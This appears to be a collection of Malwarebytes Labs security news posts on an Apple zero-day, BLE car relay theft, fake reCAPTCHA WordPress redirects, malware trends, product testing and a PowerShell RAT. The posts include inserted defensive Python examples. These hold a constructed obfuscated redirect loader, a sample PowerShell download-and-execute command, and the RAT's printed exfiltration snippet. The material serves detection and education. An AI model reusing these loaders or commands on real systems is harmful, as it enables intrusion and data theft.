IT NEWS

Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV

Apple has released security updates for a zero-day vulnerability that affects multiple products, including Mac, Apple Watch, and Apple TV.

The flaw is an out-of-bounds write issue, tracked as CVE-2022-22675, in AppleAVD, a kernel extension that decodes certain audio and video media formats.

An out-of-bounds write lets an attacker corrupt memory beyond the buffer a program intended to write to, memory that may hold other data, pointers, or control structures belonging to more privileged code. When the buggy code runs in the kernel, as AppleAVD does, that corruption can be turned into arbitrary code execution with kernel privileges, which is the impact Apple's advisory describes for this bug.

Attackers could take control of affected devices if they exploit this flaw.

CVE-2022-22675 is the same vulnerability that Apple patched in March for macOS Monterey (12.3.1), iOS (15.4.1), and iPadOS (15.4.1).

This latest batch of updates adds the same improved bounds checking to further Apple platforms, namely macOS Big Sur 11.6.6, watchOS 8.6, and tvOS 15.5. They cover Macs running Big Sur, Apple Watch Series 3 and later, and Apple TV 4K (both generations) and Apple TV HD.

Apple says it’s aware this flaw is currently being abused in the wild. It didn’t go into detail, likely to give customers time to patch up their Apple devices.

BleepingComputer has noted that attacks against CVE-2022-22675 may be targeted rather than widespread. Even so, if you use any of the Apple products mentioned above, apply the updates as soon as you can: "exploited in the wild" means a working exploit exists, whoever it is currently aimed at.

Stay safe!

The post Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV appeared first on Malwarebytes Labs.

Car owners warned of another theft-enabling relay attack

Tesla owners are no strangers to reports of their cars being tampered with outside of their control. Back in 2021, a zero-click exploit let a drone take over the car's infotainment system. In 2016, we had a brakes and doors issue. 2020 saw researchers rewriting key-fob firmware over Bluetooth. And in January this year, a teen claimed he had managed to remotely hack into 25 Tesla vehicles.

This time, we have another Bluetooth key issue making waves. The researchers published a Tesla-specific advisory, but also a general advisory for the underlying Bluetooth Low Energy proximity-authentication weakness and one for a type of smart lock that relies on the same approach.

Bluetooth Low Energy and keyless entry systems

The researchers who discovered this issue are clear that it isn't "just" a problem for Tesla. It is a problem with how keyless entry systems use Bluetooth Low Energy (BLE): they treat a BLE connection to the key as proof that the key is physically close to the lock. Bluetooth is a short-range wireless technology which uses radio frequencies to share data; you can connect one device to another, interact with Bluetooth beacons, and much more. Its short range is what makes it feel like a natural fit for keyless door entry, but short range is not the same thing as verified distance, and that gap is exactly what a relay attack exploits.

As the name suggests, BLE is all about providing functionality with very low energy consumption. The radio spends most of its time asleep and is only active for short bursts, which makes it far more efficient than classic Bluetooth for small battery-powered devices such as key fobs and phones.

The relay attack in action

Researchers demonstrated how this compromise of the keyless system works in practice. Though light on details, Bloomberg's report notes that it is a relay attack, a well-worn technique in car-security research for popping locks.

To help describe a relay attack, it’s common to first explain how a Man in the Middle (MitM) attack works:

In cybersecurity, a Man-in-the-Middle (MitM) attack happens when a threat actor manages to intercept and forward the traffic between two entities without either of them noticing. In addition, some MitM attacks alter the communication between parties, again without them realizing.

For relay attacks, think of two people (or one person with two devices) sliding their way into the communication between the car and its key. Some of the diagrams explaining this attack can be a little confusing, but the video demonstration linked in the original post makes it clear. In outline:

Two people approach the car. One pulls the door handle, which triggers the car's security system into sending out a challenge: in effect, "is the correct key for this vehicle nearby?" That challenge is beamed out into the void. The second person is standing by the house with a relay device.

People often leave their car keys close to the front door, so the key is within range of the second person's device. That device forwards the car's challenge to the key, captures the key's genuine response, and beams it back to the accomplice by the car, whose device passes it on to the car as if the key were right there. The car sees a correct answer and the door unlocks. The pair then repeat the exchange to satisfy the start-authorisation check, which fools the car into thinking the key is inside, at which point they're able to drive away.
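The exchange just described, reduced to a toy simulation as an added example (this is not code from the original post, from Tesla or from the researchers): a car sends a random challenge, the key answers with an HMAC under a shared pairing key, and two relay boxes forward the bytes unchanged. The key, the HMAC construction and the timing figures are constructed assumptions.

```python
"""Toy model of a BLE-style passive-entry handshake and a relay against it.

Added example, not code from the original post, from Tesla or from the
researchers. The protocol, key and timing numbers are constructed assumptions
chosen to illustrate one point: a cryptographically sound challenge/response
proves the key *answered*, not that it is *nearby*.
"""
import hashlib
import hmac
import os
import time
from typing import Callable, Optional

SHARED_KEY = b"demo-pairing-secret"   # constructed; a real system uses a pairing key

Link = Callable[[bytes], bytes]       # anything that answers a challenge over "the air"


class KeyFob:
    """Legitimate key: answers any challenge it hears with HMAC-SHA256(key, challenge)."""

    def __init__(self, key: bytes) -> None:
        self._key = key

    def respond(self, challenge: bytes) -> bytes:
        return hmac.new(self._key, challenge, hashlib.sha256).digest()


class Car:
    """Sends a fresh random challenge and verifies the answer.

    max_rtt_ms is an optional round-trip bound, the kind of latency check some
    vendors add to detect relays; None means 'trust any valid answer'.
    """

    def __init__(self, key: bytes, max_rtt_ms: Optional[float] = None) -> None:
        self._key = key
        self.max_rtt_ms = max_rtt_ms

    def try_unlock(self, link: Link) -> bool:
        challenge = os.urandom(16)                       # fresh nonce: replay is not the issue
        started = time.perf_counter()
        response = link(challenge)                       # whatever is in radio range answers
        rtt_ms = (time.perf_counter() - started) * 1000.0
        expected = hmac.new(self._key, challenge, hashlib.sha256).digest()
        if not hmac.compare_digest(response, expected):
            return False                                 # wrong key: the crypto does its job
        if self.max_rtt_ms is not None and rtt_ms > self.max_rtt_ms:
            return False                                 # answer took too long to come back
        return True


def direct_link(fob: KeyFob) -> Link:
    """Key is genuinely next to the car."""
    return fob.respond


def relay_link(fob: KeyFob, hop_delay_ms: float) -> Link:
    """Two relay boxes: one at the car, one near the house where the key sits.

    Each hop forwards the bytes unchanged; the fob cannot tell the car is far away.
    hop_delay_ms is the simulated one-way delay introduced by the relay equipment.
    """
    def forward(challenge: bytes) -> bytes:
        time.sleep(hop_delay_ms / 1000.0)                # car-side box -> house-side box
        response = fob.respond(challenge)                # key answers as if the car were there
        time.sleep(hop_delay_ms / 1000.0)                # house-side box -> car-side box
        return response
    return forward


def demo() -> dict:
    """Run the four scenarios and report which ones unlock the car."""
    fob = KeyFob(SHARED_KEY)
    return {
        "direct": Car(SHARED_KEY).try_unlock(direct_link(fob)),
        "relayed_no_bound": Car(SHARED_KEY).try_unlock(relay_link(fob, 50.0)),
        "relayed_with_bound": Car(SHARED_KEY, max_rtt_ms=25.0).try_unlock(relay_link(fob, 50.0)),
        "direct_with_bound": Car(SHARED_KEY, max_rtt_ms=25.0).try_unlock(direct_link(fob)),
        "wrong_key": Car(SHARED_KEY).try_unlock(direct_link(KeyFob(b"another-car"))),
    }


if __name__ == "__main__":
    print(demo())
```

The relay succeeds because nothing in the challenge/response binds the answer to distance: the cryptography only proves that the key answered. The optional round-trip bound shows the obvious counter-measure and its limit: it catches a clumsy relay that adds tens of milliseconds, but the researchers' link-layer relay reportedly adds only a few milliseconds, well inside what a real BLE stack has to tolerate. Robust fixes need genuine distance bounding (time-of-flight ranging) or an explicit user action such as a PIN before driving.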

A gear-shift in criminal perspective

Criminals are after maximum gain for minimum effort. They don’t want to attract attention from law enforcement. The sneakier they can be, the less commotion they cause, and the better it’s going to be for them in the long-term.

Think about how seamless a relay approach is to car theft. It’s quick, it’s easy, and it’s completely silent. Consider how much money a professional outfit pulling these car heists can generate. The alternative is messy break-ins, noise, rummaging for keys in a house full of screaming people and barking dogs. Not to mention a significantly increased chance of being caught. If you were a career criminal, which approach would you favour?

A problem which refuses to go away

Relay attacks on cars have been around for several years now. Stolen vehicles are the go-to example of relay attacks if you go looking for more information on the technique. Advice for avoiding relay attacks is widespread, from keeping keys away from the front door (which you should do anyway) to placing them in a signal-blocking bag.

For the Tesla-specific attack, one relay device was placed "within roughly 15 yards" of the smartphone or key fob, with the other plugged into a laptop close to the vehicle. The researchers' general advisory describes the broader forms of the attack.

The article mentions that there's no evidence of this Tesla tomfoolery having happened in the wild. Even so, relay attacks can and do take place. If your car uses a keyless system, take this latest report as a heads-up to check what protections your vehicle offers, whatever its make or model: some cars allow you to require a PIN before driving, and fobs that stop transmitting when left stationary are becoming more common.

The post Car owners warned of another theft-enabling relay attack appeared first on Malwarebytes Labs.

A week in security (May 9 – 15)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (May 9 – 15) appeared first on Malwarebytes Labs.

Fake reCAPTCHA forms dupe users via compromised WordPress sites

Researchers at Sucuri investigated a number of WordPress websites whose owners complained about unwanted redirects, and found that visitors were being sent to websites that use fake CAPTCHA forms to get them to accept web push notifications.

These websites are a new wave of a campaign that leverages many compromised WordPress sites.

CAPTCHA

CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) is one of the annoyances that we have learned to take for granted when we browse the Internet. Scientists developed CAPTCHA as a method to tell humans and bots apart so as to keep bots from accessing sites or systems where they are not welcome.

Google bought and now owns reCAPTCHA, a CAPTCHA system designed to minimise the amount of interaction required from the user. The original version asked users to decipher hard-to-read text or match images. Version 2 only asks the user to decipher text or match images if its risk analysis (based on signals such as cookies and browser behaviour) suggests the page was loaded automatically; otherwise a single "I'm not a robot" checkbox suffices. Version 3 doesn't interrupt users at all: it runs automatically when pages load or buttons are clicked and hands the site a score that the site itself decides how to act on.

The basic version of a real reCAPTCHA the threat actors used as a template to create the fake ones looks like this:

(Image: a legitimate reCAPTCHA prompt, the kind the threat actors used as a template for their fakes)

The campaign

The fake CAPTCHA sites are part of a long lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the years.

The compromised websites all share a common issue: the threat actors injected malicious JavaScript into the affected site's files and database. On a compromised site, the attackers attempt to infect every .js file with "jquery" in its name, appending obfuscated code to the end of the legitimate script when successful, or placing it in the head of the page. Either way the code fires on every page load and redirects visitors to a destination chosen by the threat actor.

The Malwarebytes Threat Intelligence Team tracked a rogue affiliate's traffic which flowed through the same local[.]drakefollow[.]com subdomain that was mentioned in the Sucuri blog. The threat actor chose to promote a legitimate security product in this case, but could just as easily have led visitors to potentially unwanted programs (PUPs), adware, or tech support scams.

(Image: Wireshark capture of the traffic flow from a compromised WordPress site to the rogue affiliate's site)
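A small triage script for the injection described above, added here as an example (it is not Sucuri's or Malwarebytes' tooling). It scans a site tree for jquery-named .js files whose tail carries an obfuscated loader, decodes String.fromCharCode arrays to reveal where the loader points, and shows what was appended when compared with a pristine copy of the library. The library stub, the loader and the thresholds are constructed assumptions; the only indicator taken from the post is the drakefollow[.]com redirect domain.

```python
"""Triage helper for the jQuery-file injection described in the post.

Added example, not Sucuri's or Malwarebytes' tooling. Two checks a site owner
can run offline: (1) does a jquery-named .js file carry an obfuscated loader
in its tail, and (2) what did the attacker append compared with a pristine copy
of the library. The library text, the injected loader and the thresholds below
are constructed assumptions, not samples from the campaign.
"""
import os
import re
import tempfile
from typing import Dict, List, Optional

KNOWN_BAD_HOSTS = ("drakefollow.com",)   # the redirect domain named in the post
SUSPICIOUS_CALLS = re.compile(
    r"\b(?:eval|Function|String\.fromCharCode|unescape|atob|document\.write)\s*\(")
CHARCODE_ARRAY = re.compile(r"(?:\d{2,3}\s*,\s*){20,}\d{2,3}")   # 21+ comma-separated char codes
TAIL_BYTES = 4096   # the appended loader lives at the end of an otherwise large library


def decode_charcode_arrays(text: str) -> List[str]:
    """Turn String.fromCharCode(104,116,...) style arrays back into strings."""
    out = []
    for match in CHARCODE_ARRAY.finditer(text):
        codes = [int(c) for c in re.findall(r"\d+", match.group(0))]
        out.append("".join(chr(c) for c in codes if c < 0x110000))
    return out


def score_tail(text: str) -> Dict[str, int]:
    """Count loader indicators in the last TAIL_BYTES of the file."""
    tail = text[-TAIL_BYTES:]
    decoded = " ".join(decode_charcode_arrays(tail))
    return {
        "suspicious_calls": len(SUSPICIOUS_CALLS.findall(tail)),
        "charcode_arrays": len(CHARCODE_ARRAY.findall(tail)),
        "known_bad_hosts": sum(tail.count(h) + decoded.count(h) for h in KNOWN_BAD_HOSTS),
    }


def is_suspicious(text: str) -> bool:
    s = score_tail(text)
    # jQuery itself contains a String.fromCharCode call, so one call alone is not enough
    return s["known_bad_hosts"] > 0 or s["charcode_arrays"] > 0 or s["suspicious_calls"] >= 2


def appended_payload(text: str, pristine: str) -> Optional[str]:
    """If the file is the pristine library with something glued on, return the extra part."""
    if text.startswith(pristine) and len(text) > len(pristine):
        return text[len(pristine):]
    return None


def scan_tree(root: str) -> List[str]:
    """Paths (relative to root) of jquery-named .js files whose tail looks injected."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if "jquery" in name.lower() and name.lower().endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if is_suspicious(fh.read()):
                        hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


# Constructed stand-ins: a stub "library" and a loader that decodes a redirect URL
PRISTINE_JQUERY = ("/*! jQuery v3.6.0 (constructed stub) */\n"
                   "!function(e,t){\"use strict\";var q=function(){};e.jQuery=q}(window);\n")
INJECTED_LOADER = (
    "var _0x=String.fromCharCode(104,116,116,112,115,58,47,47,108,111,99,97,108,46,"
    "100,114,97,107,101,102,111,108,108,111,119,46,99,111,109,47);"
    "eval('location='+'\"'+_0x+'\"');"
)


def demo() -> Dict[str, object]:
    """Write a small fake site to a temp dir, scan it, and decode the loader."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-includes", "js"))
        files = {
            os.path.join("wp-includes", "js", "jquery.min.js"): PRISTINE_JQUERY,
            os.path.join("wp-includes", "js", "jquery-migrate.min.js"): PRISTINE_JQUERY + INJECTED_LOADER,
            "app.js": PRISTINE_JQUERY + INJECTED_LOADER,   # same loader, but not a jquery-named file
        }
        for rel, content in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(content)
        hits = scan_tree(root)
    return {
        "hits": hits,
        "appended": appended_payload(PRISTINE_JQUERY + INJECTED_LOADER, PRISTINE_JQUERY),
        "decoded": decode_charcode_arrays(INJECTED_LOADER),
    }
```

The heuristic tail scan is a quick sweep and will need tuning against your own theme and plugin scripts; the comparison with a pristine copy (or of the file's hash against the one shipped with your WordPress version) is the reliable check, and it doubles as the remediation: restore the clean file. Injections stored in the database (widgets, post content, theme options) need a separate search of the wp_options and wp_posts tables for script tags.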

The fake CAPTCHA

At this point in the chain of redirections, the fake reCAPTCHA websites kick in. The fake reCAPTCHA sites are the final step towards duping the visitor. The unsuspecting visitor will land on a site that tries to trick them into accepting push notifications from the landing page’s domain.

(Image: the fake reCAPTCHA page asking the visitor to click "Allow")

Visitors think they need to click “Allow” to get past the CAPTCHA screen, when in fact they are giving permission to the domain to send them push notifications.

By design, push notifications look much the same across operating systems and browsers. They appear outside the browser window, in the operating system's own notification area (on Windows, for example, just above the taskbar on the right-hand side), so they may seem to originate from the operating system itself. Telling a web push notification apart from an alert that comes from the operating system or another installed program is hard, which is exactly what makes them useful to scammers and confusing for the unsuspecting user.

As we reported in the past, adware, search hijackers, and PUP families have added push notifications as one of their attack vectors. Sucuri warns that it is also one of the most common ways attackers display “tech support” scams, where users are told their computer is infected or slow and they should call a toll-free number to fix the problem.

Removal and mitigation

Knowing that these fake reCAPTCHA sites exist and being able to spot the difference with a real one is your best protection. Also, many security programs, including Malwarebytes, will block access to the campaign’s domains.

If your system shows you push notifications, you can find detailed instructions on how to disable and remove permissions for browser push notifications in our article: Browser push notifications: a feature asking to be abused.

Website owners can use Sucuri’s free remote website scanner to detect the malware.

Stay safe, everyone!

Special thanks to the Malwarebytes Threat Intelligence Team for their contribution and the screenshot

The post Fake reCAPTCHA forms dupe users via compromised WordPress sites appeared first on Malwarebytes Labs.

How COVID-19 fuelled a surge in malware

2021 saw a massive surge in detections of malware, adware, and Potentially Unwanted Programs (PUPs). It didn’t matter what the computers were used for or what operating system they ran—across business and home computers, on Windows and on Mac, detections went up, enormously.

Detections of malware on Windows business machines were 143% higher in 2021 than in 2020, and 65% higher on consumer machines.

(Chart: Windows malware detection totals 2019-2021)

Detections of malware, adware, and PUPs on macOS increased almost 220%.

(Chart: Mac malware, adware and PUP detection totals 2019-2021)

The background to this extraordinary jump in detections is the coronavirus pandemic, so we call this surge in detections the “Covid bounce”.

The Covid bounce

In 2020, the recently-discovered novel coronavirus, and the restrictions put in place to slow its progress, caused trillions of dollars of lost economic activity and a mass migration of knowledge workers from offices to homes.

Almost all forms of business suffered—even illegal ones like cybercrime. Crooks were just as likely to get COVID-19 as anyone else, and the targets they preyed upon changed beyond recognition.

Many businesses wound down or folded, and those that didn’t had to upend their IT infrastructure overnight to support working from home. How people worked, where they worked, the tools they used, and the things they cared about were all in flux.

No wonder then, that in 2020, malware detections on Windows business machines fell 24%.

The effect was not spread evenly across all types of malware though. Detections of Emotet and TrickBot collapsed by 89% and 69% respectively, leading some to speculate that while these highly sophisticated forms of malware were extremely effective at permeating corporate networks they may be poorly adapted to exploit the work-from-home environment.

Meanwhile, detections of hacking tools, information stealers, and other malware that could help criminals better understand the transformation in their victims’ environments, increased considerably.

In 2021, as restrictions lifted gradually around the world, and as organisations and the criminals preying on them adapted to remote and hybrid work, detection numbers climbed precipitously.

And they didn’t simply return to the pre-Covid status quo, they soared past 2019’s numbers. In 2021, the detection numbers for business threats were 85% higher than in 2019, and consumer threat detections were 47% higher.

Cryptocurrency values soared in 2021 and, to nobody’s surprise, detections of malware that mines cryptocurrencies increased more than 300 percent.

Adware, spyware, and worms all displayed an enormous bounce back in 2021, climbing 200%, and detections of email threats showed a considerable “Covid bounce” too. But while the old guard of Emotet and TrickBot remained, they were not the presence of old as several new pretenders jostled for position.

It is impossible to say why detections bounced back so alarmingly last year, but the plain fact is that the world now is not the world of 2019. Events like the coronavirus pandemic have far-reaching effects that go far beyond the immediate, obvious and tragic health consequences, affecting all walks of life, even the security of your servers, laptops, and remote workers.

The pandemic accelerated the transition from a bricks-and-mortar to online existence, and for many businesses and services there is no going back.

After a period of adjustment and uncertainty in 2020, cybercrime seems to have emerged supremely well adapted to this new reality.

You can learn more about the Covid bounce and how it changed the outlook for cyberthreats into 2022 and beyond in the Malwarebytes 2022 Threat Review.

The post How COVID-19 fuelled a surge in malware appeared first on Malwarebytes Labs.

Why MRG-Effitas matters to SMBs

When selecting the right cybersecurity vendor to protect their operations, small- and medium-sized businesses (SMBs) can lean on several third-party research organizations that analyze which cybersecurity products can best prevent, detect, and clean up various types of cyberattacks today.

But these tests can sometimes assume a level of end-user complexity—and funding and staffing—that the average SMB might lack. Without a full-time security team, or even a single full-time internal IT hire, an SMB could unwittingly purchase a cybersecurity product that, while effective, requires a level of expertise they simply do not have.

This is where one third-party research team, in particular, can help.

MRG-Effitas, which produces quarterly reports about cybersecurity products that publicly participate in evaluations, focuses its analyses on “real world” malware attacks and detection capabilities. Not only do the researchers test malware samples that are currently infecting endpoints across the world, but the researchers also stress the importance of simple, effective notifications that will help the average user respond to any detected cyberthreat.

“Simulating normal user behaviour means that we pay special attention to all alerts given by security applications,” wrote the researchers in their most recent quarterly report for their program, the “360° Assessment & Certification.”

The 360° Assessment & Certification combines several tests that are then grouped into four separate certifications. Based on how a cybersecurity product performed in certain tests, that product will either earn a certificate or not. This almost-binary representation of a product’s performance is simple and effective, and it can help to quickly inform an SMB about whether a certain product is right for their company.

At the core of the MRG-Effitas certification process—which tests how products respond to known exploits, ransomware, botnets, adware, and more—is the user.

“A pass is given only when alerts are straightforward, and clearly suggest that the malicious action should be blocked,” the report said. “With this in mind, it is very important to note that the best choice for an average user is to keep things as simple as possible and not to overwhelm them with cryptic pop-ups, alerts or questions.”

Testing and certification

The 360° Assessment & Certification by MRG-Effitas involves the following nine rounds of testing:

  • In the Wild/Full Spectrum Test
  • PUA/Adware Test
  • Exploit/Fileless Test
  • Real Botnet Test
  • Banking Simulator Test
  • Ransomware Simulator Test
  • False Positive Ransomware Test
  • False Positive Test
  • Performance Test

Each test has a specific purpose, from testing how cybersecurity products respond to an end-user visiting a malicious URL that delivers malware, to the detection of non-malicious but meddlesome applications such as adware, to even testing how a product responds to live ransomware samples observed in real world applications, and to simulated ransomware samples developed by MRG-Effitas. Importantly, MRG-Effitas also tests the performance load of each cybersecurity product, analyzing how much time it takes to perform certain tasks on devices that have the cybersecurity product installed.

While MRG-Effitas performs testing in the above nine categories, it only awards certificates in four categories: The 360° Assessment, the 360° Exploit Degree, the 360° Online Banking Degree, and the 360° Ransomware Degree.

For the 360° Assessment, MRG-Effitas assigns two levels of certification—Level 1 and Level 2—depending on how successfully a cybersecurity product detected the cyberthreats that were launched at it during testing. A product only receives Level 1 certification if it detected all threats on “first exposure or via behaviour protection,” the report said, and it passed the Real Botnet Test.

The malware load used during the 360° Assessment is significant. In the most recent round, it involved 360 “In The Wild” samples that included: “20 trojans, 54 backdoors, 50 financial malware samples, 53 ransomware, 49 spyware, 84 malicious documents, [and] 50 malicious script files.”

Just four products publicly received a Level 1 certification in the recent 360° Assessment: Malwarebytes Endpoint Protection, Bitdefender Endpoint Security, Microsoft Windows Defender, and Symantec Endpoint Protection.

A similar test deploys 50 financial malware samples against the detection and protection capabilities of the cybersecurity products, along with simulated banking malware. Five products publicly received the 360° Online Banking Certification: Malwarebytes Endpoint Protection, Avira Antivirus Pro, Bitdefender Endpoint Security, ESET Endpoint Security, and Symantec Endpoint Protection.

Ransomware simulations

In just the past decade, ransomware has evolved tremendously. Developers of the infamous family of malware have gone from asking for measly sums of money from individuals to creating entire business models in which they license out their ransomware tool to other threat actors. When those threat actors successfully hit a business—which they could have purchased access to from other threat actors—the original ransomware developers take a cut of whatever eventual payment is made. To make matters worse, threat actors have also begun deploying ransomware that not only encrypts a company’s files, but it also first exfiltrates any sensitive data, which the threat actors then use as a second point of leverage: Pay up or your data will be published for everyone to see.

The researchers at MRG-Effitas, recognizing this rapid pace of ransomware evolution, have, for years, tested cybersecurity products against ransomware samples developed in-house that could represent where ransomware development is headed in just months or years.

In the most recent 360° Assessment & Certification, MRG-Effitas deployed 53 ransomware samples against the cybersecurity products, and an additional four simulated ransomware samples. To achieve the 360° Ransomware Certification, a product must have protected a device from all 53 ransomware samples and all four simulated ransomware samples, and it must have passed the false positive ransomware test.

In the most recent round of testing, all nine publicly-evaluated cybersecurity products achieved ransomware certification.

Performance

Understanding whether a cybersecurity product works well is, obviously, important. But of similar importance to SMBs is understanding what impact a cybersecurity product will have on a suite of endpoints. Without large budgets that could allow for constantly refreshed, new devices to be purchased, SMBs should consider how much a cybersecurity product could slow down their organizations’ devices.

Thankfully, MRG-Effitas analyzes cybersecurity products based on their impact on performing simple operations, like downloading a file, opening a Microsoft Office program, or opening a website. The analysis also measures the time spent performing a security software update and the CPU usage during the update process.

Unlike the certificates offered by MRG-Effitas for other categories, there is no certificate or “pass/fail” result when testing performance. Instead, SMBs can look at the performance measurements for each product in the latest 360° Assessment & Certification.

Less “interpretation,” quicker answers

The simplicity of MRG-Effitas’ 360° Assessment & Certification gives SMBs a quick guide into what cybersecurity products could be the right fit for them. Without having to dive into countless interpretive reports from each cybersecurity vendor, SMBs can instead look at the most recent 360° Assessment & Certification and ask themselves: Which of these products received certification and which did not?

Knowing that MRG-Effitas hews its testing ideology to the user—only offering certifications for products that clearly notify and warn users about how to respond to a threat—SMBs can be sure that whatever tool they choose will, at the very least, be easy to use on their end.

The post Why MRG-Effitas matters to SMBs appeared first on Malwarebytes Labs.

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

This blog post was authored by Hossein Jazi and Jérôme Segura

Populations around the world—and in Europe in particular—are following the crisis in Ukraine very closely, and with events unfolding on a daily basis, people are hungry for information.

Although all countries have reasons to be concerned, the situation in Germany is more complicated than most. It is one of the few European countries to have received criticism for its attitude to the Ukraine-Russia conflict, as it struggles to end its reliance on Russian energy, and Moscow recently imposed sanctions on Gazprom Germania, further increasing economic tensions.

This week our analysts discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact a decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.

Decoy site lures victims with Ukraine situation

Threat actors registered an expired German domain name, collaboration-bw[.]de, that was formerly used as a collaboration platform for developing new ideas for the state of Baden-Württemberg.

(Image: the expired Baden-Württemberg collaboration domain that the threat actors re-registered)

The threat actors used the domain to host a website that looked like the official Baden-Württemberg website, baden-wuerttemberg.de.

(Image: the real baden-wuerttemberg.de (top) and the malicious fake (bottom))

With this copycat, the attackers created the perfect placeholder for the lure they wanted their victims to download: a file tantalisingly named 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.

(Image: the lure page promising important information and tips about the Ukraine crisis)

An English translation of the page reads:

Important, current threat situation regarding the Ukraine crisis

On this website you will always find the most important information and tips for dealing with the current threat posed by the Ukraine crisis. Please download the document now and read through the current information. The document is constantly updated and is up to date. Our suggested tips can be practically implemented in everyday work and you should already implement them today. Thanks for your support.

File analysis

The archive file called 2022-Q2-Bedrohungslage-Ukraine contains a file named 2022-Q2-Bedrohungslage-Ukraine.chm. The CHM format is Microsoft’s HTML help file format, which consists of a number of compiled HTML files.

(Image: the CHM file displaying a fake error message)

Victims see a fake error message when they open the file, while in the background PowerShell quietly runs a Base64-encoded command.

(Image: PowerShell executing the Base64-encoded command)

After de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).

(Image: the decoded PowerShell command, which fetches and executes a script)
(Image: the malicious script downloaded from the fake Baden-Württemberg website)

The downloaded script creates a folder called SecuriyHealthService (the misspelling is the malware's own) in the current user's profile directory and drops two files into it: MonitorHealth.cmd and a PowerShell script saved as Status.txt. The .cmd file is very simple and just runs Status.txt through PowerShell; the innocuous .txt extension helps the script escape casual inspection.

Finally, the downloaded script makes MonitorHealth.cmd persistent by creating a scheduled task that will execute it each day at a specific time.
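Decoding the launch step described above, as an added example (not part of the original analysis and not the actors' code): the CHM starts PowerShell with a Base64 -EncodedCommand, and the first thing an analyst or a detection rule needs is the plaintext. The sample command line is constructed to the shape the post describes; the URL and script name are placeholders rather than the real fake-site address.

```python
"""Decoder and triage for a 'powershell -enc <Base64>' launch like the one in the CHM.

Added example, not part of the original analysis and not the actors' code. The
command line used in SAMPLE_CMDLINE is constructed: it reproduces the shape the
post describes (Invoke-Expression over a downloaded script), but the URL is a
placeholder, not the real fake-site address.
"""
import base64
import binascii
import re
from typing import Dict, Optional

# Any unambiguous prefix of -EncodedCommand is accepted by powershell.exe (-e, -ec, -enc, ...)
FLAG_RE = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|iwr|"
                      r"Invoke-RestMethod|irm|Start-BitsTransfer)\b", re.IGNORECASE)
EXEC_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden in a -EncodedCommand argument, or None.

    powershell.exe expects the Base64 to wrap UTF-16LE text; decoding it as UTF-8
    (a common mistake in ad-hoc triage) yields NUL-interleaved garbage.
    """
    for match in FLAG_RE.finditer(cmdline):
        flag, blob = match.group(1).lower(), match.group(2)
        if not "encodedcommand".startswith(flag):       # e.g. -ExecutionPolicy is not it
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def triage_script(script: str) -> Dict[str, object]:
    """Pull out URLs and flag the download-and-run pattern."""
    urls = URL_RE.findall(script)
    fetch = bool(FETCH_RE.search(script))
    execute = bool(EXEC_RE.search(script))
    return {
        "urls": urls,
        "fetches_remote_content": fetch,
        "invokes_expression": execute,
        # download-and-run inside one encoded command is the pattern to alert on
        "download_and_execute": fetch and execute,
    }


def triage_command_line(cmdline: str) -> Dict[str, object]:
    """Decode a process command line and triage whatever script it carried."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"decoded": None, "urls": [], "download_and_execute": False}
    result = triage_script(script)
    result["decoded"] = script
    return result


def build_encoded_command(script: str) -> str:
    """Inverse of the decoder, used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: placeholder URL, shape follows the post's description
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/collab/script.ps1')"
SAMPLE_CMDLINE = ("powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -enc "
                  + build_encoded_command(SAMPLE_SCRIPT))

if __name__ == "__main__":
    print(triage_command_line(SAMPLE_CMDLINE))
```

The decoder accepts any prefix of -EncodedCommand, as powershell.exe does, and decodes the payload as UTF-16LE, which is the detail most often missed when someone pastes the blob into a generic Base64 tool. The same function runs happily over Sysmon or EDR process-creation events in bulk; a decoded command that both fetches remote content and pipes it into Invoke-Expression is a strong enough pattern to alert on regardless of the domain involved.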

PowerShell RAT (Status.txt)

Status.txt is a RAT written in PowerShell. It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. It also builds a unique id for the victim, the clientid.

This data is exfiltrated as a JSON data structure sent to the server via a POST request:

$json = '{
  "type": "newclient",
  "result": "",
  "pwd": "' + $pwd_b64 + '",
  "cuser": "' + $cuser + '",
  "hostname": "' + $hname + '",
  "clientid": "' + $clientid + '"
}';

$headers = @{'X-Request-ID' = $strhash;}

However, before sending this request the script first bypasses the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass, which is decrypted with a generated key and IV before execution.

(Image: the bypass function containing the encrypted AMSI bypass script)
(Image: the content of the AMSI bypass script after decryption)

This RAT has the following capabilities:

  • Download (type: D0WNl04D): Download files from server
  • Upload (type: UPL04D): Upload file to the server
  • LoadPS1 (type: L04DPS1): Load and execute a PowerShell script
